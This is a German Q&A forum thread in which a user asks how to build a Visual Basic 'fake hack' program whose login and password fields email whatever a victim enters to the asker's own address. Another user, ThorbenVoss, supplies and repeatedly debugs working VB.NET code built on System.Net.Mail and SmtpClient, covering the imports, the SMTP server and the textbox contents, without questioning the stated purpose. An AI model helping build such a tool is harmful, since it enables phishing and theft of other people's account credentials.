visual basic fake hack erstellen?

...komplette Frage anzeigen

2 Antworten

Ich hab da noch eine Datei auf meinem Server liegen, die dir zeigt, wie du Mails schreibst: http://www.thorben-voss.de/thorben-voss-dateien/mail_senden.zip Als Mail-Body müsstest du dann noch den Inhalt der Textboxen in eine Variable packen und die dann senden :

 Dim text As String
 text = TextBox1.Text + " " + TextBox2.Text + " " + TextBox3.Text

Ich hoffe, es bringt dir was, Thorben

DerFragenSteler 22.06.2011, 13:59

habs mir noch net angeguckt aber ich willes so machen das da felder sind wo man loginnamen und passwort eingeben muss dan nauf hack ist oder hacken oder so klickt(button) und dan nder login name und passwort an miene e-mail gesendet wird

0
DerFragenSteler 22.06.2011, 16:39
@ThorbenVoss

naja ic hversteh net wasi ch mior naguicken soll ich weiss vo nejmanden das ich irgend so ein smpt server brauch

0
ThorbenVoss 22.06.2011, 17:13
@DerFragenSteler

Du solltest das auch langsamer angehen, z.B. mit einer Msgbox, nicht, dass du schon morgen das CIA hackst,... http://lmgtfy.com/?q=vba+tutorials

0
DerFragenSteler 22.06.2011, 21:29
@ThorbenVoss

hab noch net ausprobiert..... 1.also die email adresse mussi hc in meine verändern oder? 2. kann ich auch 2 text boxen wegen username und passwort? 3.ist egal welche Nr1 von den ist 4.esk ommt kiene asbfrage oder nachricht das die gesendet wurde oder?

0
ThorbenVoss 23.06.2011, 00:00
@DerFragenSteler

Wenn sie erfolgreich gesendet wurde schließt sich das Fenster, kann man natürlich noch mit einer MsgBox o.ä. ändern. Den Code für sogar 3 Textboxen hab ich dir weiter oben schon geschrieben, das du die Mailadresse (irgendwas@mailanbieter.bla) verändern musst ist denk ich mal klar, den Rest deiner Frage versteh ich leider nicht. Probiers doch einfach mal aus,...

0
DerFragenSteler 23.06.2011, 15:09
@ThorbenVoss

ok ihc hab alles ab den anhang gelsöcht da irgendwo dadrinne ein fehler war also geht der code nicht wenn ich beide text boxen haben will?

0
ThorbenVoss 23.06.2011, 16:32
@DerFragenSteler

In dem Code ist/war kein Fehler, schreib mal deinen jetzigen Code und sag, was du genau mit den Textboxen meinst

0
DerFragenSteler 24.06.2011, 18:56
@DerFragenSteler

Fehler 1 "Class" muss mit einem entsprechenden "End Class" abgeschlossen werden. C:\Users\Nils\AppData\Local\Temporary Projects\Msn Client\Form1.vb 1 1 Msn Client Fehler 2 Imports-Anweisungen müssen vor Deklarationen stehen. C:\Users\Nils\AppData\Local\Temporary Projects\Msn Client\Form1.vb 8 5 Msn Client Fehler 3 Der Typ "MailMessage" ist nicht definiert. C:\Users\Nils\AppData\Local\Temporary Projects\Msn Client\Form1.vb 10 37 Msn Client Fehler 4 Der Typ "Attachment" ist nicht definiert. C:\Users\Nils\AppData\Local\Temporary Projects\Msn Client\Form1.vb 11 23 Msn Client Fehler 5 Die Handles-Klausel erfordert eine WithEvents-Variable, die im enthaltenden Typ oder einem seiner Basistypen definiert wird. C:\Users\Nils\AppData\Local\Temporary Projects\Msn Client\Form1.vb 12 103 Msn Client Fehler 6 Der Typ "MailMessage" ist nicht definiert. C:\Users\Nils\AppData\Local\Temporary Projects\Msn Client\Form1.vb 13 38 Msn Client Fehler 7 Der Typ "MailAddress" ist nicht definiert. C:\Users\Nils\AppData\Local\Temporary Projects\Msn Client\Form1.vb 14 38 Msn Client Fehler 8 Der Verweis auf einen nicht freigegebenen Member erfordert einen Objektverweis. C:\Users\Nils\AppData\Local\Temporary Projects\Msn Client\Form1.vb 16 38 Msn Client Fehler 9 "RichTextBox1" wurde nicht deklariert. Auf das Objekt kann aufgrund seiner Schutzstufe möglicherweise nicht zugegriffen werden. C:\Users\Nils\AppData\Local\Temporary Projects\Msn Client\Form1.vb 17 35 Msn Client Fehler 10 "MailPriority" wurde nicht deklariert. Auf das Objekt kann aufgrund seiner Schutzstufe möglicherweise nicht zugegriffen werden. C:\Users\Nils\AppData\Local\Temporary Projects\Msn Client\Form1.vb 18 38 Msn Client Fehler 11 Der Typ "SmtpClient" ist nicht definiert. C:\Users\Nils\AppData\Local\Temporary Projects\Msn Client\Form1.vb 19 29 Msn Client Fehler 12 "CheckBox1" wurde nicht deklariert. Auf das Objekt kann aufgrund seiner Schutzstufe möglicherweise nicht zugegriffen werden. C:\Users\Nils\AppData\Local\Temporary Projects\Msn Client\Form1.vb 25 16 Msn Client Fehler 13 "OpenFileDialog1" wurde nicht deklariert. Auf das Objekt kann aufgrund seiner Schutzstufe möglicherweise nicht zugegriffen werden. C:\Users\Nils\AppData\Local\Temporary Projects\Msn Client\Form1.vb 31 21 Msn Client Fehler 14 Der Typ "Attachment" ist nicht definiert. C:\Users\Nils\AppData\Local\Temporary Projects\Msn Client\Form1.vb 32 31 Msn Client Fehler 15 "Close" ist kein Member von "Msn_Client.Form1.Form1". C:\Users\Nils\AppData\Local\Temporary Projects\Msn Client\Form1.vb 43 17 Msn Client

0
DerFragenSteler 24.06.2011, 20:00
@ThorbenVoss

Ja, das ist dein Fehlercode, schick mal den Code, der in deinem Projekt steht<<<wie jez

glau bschon

0
ThorbenVoss 24.06.2011, 20:38
@DerFragenSteler

Ich will deinen jetzigen Code, den du verwendest, da hast du wahrscheinlich was verändert und jetzt geht es natürlich nicht mehr.

Imports-Anweisungen müssen vor Deklarationen stehen. ... Die Deklaration steht also schonmal nicht an der richtigen Stelle,... "Imports System.Net.Mail" ist das, was bei dir ganz oben stehen muss !

0
DerFragenSteler 24.06.2011, 21:07
@ThorbenVoss

Private Sub Form1_Load(ByVal sender As System.Object, ByVal e As System.EventArgs)

End Sub Public Class Form1

Private Sub Button2_Click(ByVal sender As System.Object, ByVal e As System.EventArgs) Handles Button2.Click
    Me.Close()

End Sub

Imports System.Net.Mail
Public Class Form1
    Public mymailmessage As New MailMessage
    Public att As Attachment = Nothing 'Anhang (erstmal nichts)
    Private Sub Button1_Click(ByVal sender As System.Object, ByVal e As System.EventArgs) Handles Button1.Click
        Dim mymailmessage As New MailMessage
        mymailmessage.From = New MailAddress("irgendwas@mailanbieter.bla") 'Absender
        mymailmessage.To.Add("irgendwas@mailanbieter.bla") 'Enmpfänger (Absender und Empfänger können auch gleich sein)
        mymailmessage.Subject = (TextBox1.Text) 'Betreff
        mymailmessage.Body = (RichTextBox1.Text) 'Inhalt (da könnte man jetzt auch die Daten aus der Textbox nehmen,...)
        mymailmessage.Priority = MailPriority.High 'Priorität (High, Low, Normal)
        Dim smpt As New SmtpClient("popmail.t-online.de") 'AMTP Mail Client (z.B. popmail.t-online.de,...)
        Dim basicauthentificationinfo As New System.Net.NetworkCredential("irgendwas@mailanbieter.bla", "Mail-Passwort")
        smpt.Credentials = basicauthentificationinfo



        If CheckBox1.Checked = True Then
            'Anhang (muss nicht sein)

Anhang: Dim f% f = MessageBox.Show("Möchten sie noch etwas in den Anhang legen ?", "Frage :", MessageBoxButtons.YesNo, MessageBoxIcon.Question) If f = 6 Then OpenFileDialog1.ShowDialog() att = New Attachment(OpenFileDialog1.FileName) mymailmessage.Attachments.Add(att) GoTo Anhang End If End If

        'senden (wichtig !)
        Try 'versuchen :
            smpt.Send(mymailmessage)
            Me.Close()
        Catch ex As Exception 'bei Fehler :
            MsgBox("FEHLER!")
            Beep()
        End Try
    End Sub
End Class
0
ThorbenVoss 25.06.2011, 12:49
@DerFragenSteler

Imports System.Net.Mail und Public Class Form1 müssen GANZ OBEN STEHEN ! also :

Imports System.Net.Mail
Public Class Form1

Private Sub Button2_Click(ByVal sender As System.Object, ByVal e As System.EventArgs) Handles Button2.Click
    Me.Close()
End Sub

OK ? Dann müssten sich die meißten Fehler geklärt haben

0
ThorbenVoss 25.06.2011, 14:00
@DerFragenSteler
  1. Check-Box entfernen : Die diente nur dem Anhang, kannst sie löschen. Im Code musst du folgendes entfernen :

    If CheckBox1.Checked = True Then
    Anhang:
                Dim f%
                f = MessageBox.Show("Möchten sie noch etwas in 
                                       den Anhang legen  ?", "Frage :", MessageBoxButtons.YesNo,MessageBoxIcon.Question)
         If f = 6 Then
           OpenFileDialog1.ShowDialog()
           att = New Attachment(OpenFileDialog1.FileName)
           mymailmessage.Attachments.Add(att)
           GoTo Anhang
         End If
    End If
    
0
ThorbenVoss 25.06.2011, 14:03
@ThorbenVoss

und die Rich-Text-Box

mymailmessage.Body = (RichTextBox1.Text) 'Inhalt (da könnte man jetzt auch die Daten aus der Textbox nehmen,...)

Da schreibst du in Klammern TextBox2.Text oder deine Eingabebox rein,...

0
DerFragenSteler 25.06.2011, 14:34
@ThorbenVoss

okok hab alles verändert keine fehler mehr da krieg bloß keine email xD was muss ich denn bei tmobile iengeben?

0
ThorbenVoss 25.06.2011, 14:37
@DerFragenSteler

Deinen AMTP Mail Client (z.B. popmail.t-online.de,...). Welchen Mailanbieter hast du denn ?

0
ThorbenVoss 25.06.2011, 15:36
@DerFragenSteler

Hmmm, hast du noch was anderes, hotmail.com geht anscheinend nicht, bzw. gibt es ständig Fehlermeldungen

0
DerFragenSteler 25.06.2011, 16:33
@ThorbenVoss

also ich hab den anhang gelöscht email in meine geändert und den pop teil auf pop.googlemail.com geändert udn es klappt noch immer net

0

also den Code deri m monet dort steht: Public Class Form1

Private Sub DomainUpDown1_SelectedItemChanged(ByVal sender As System.Object, ByVal e As System.EventArgs) Handles DomainUpDown1.SelectedItemChanged

End Sub

Private Sub Button1_Click(ByVal sender As System.Object, ByVal e As System.EventArgs) Handles Button1.Click
    Timer1.Start()
End Sub

Private Sub Timer1_Tick(ByVal sender As System.Object, ByVal e As System.EventArgs) Handles Timer1.Tick
    ProgressBar1.Increment("1")

End Sub

End Class

wie mache ich es wenn ich ne e-mail an XY@hotmail.com haben will mit den daten?

ThorbenVoss 22.06.2011, 15:40

Also das was du da als Code bezeichnest ist für das Füllen einer Ladeleiste. Das hat mit Mail-schicken noch nichts zu tun. Auch sehe ich da keine Angaben zu irgendwelchen Eingabefeldern,... wie heißen denn deine Textboxen ?

0

Was möchtest Du wissen?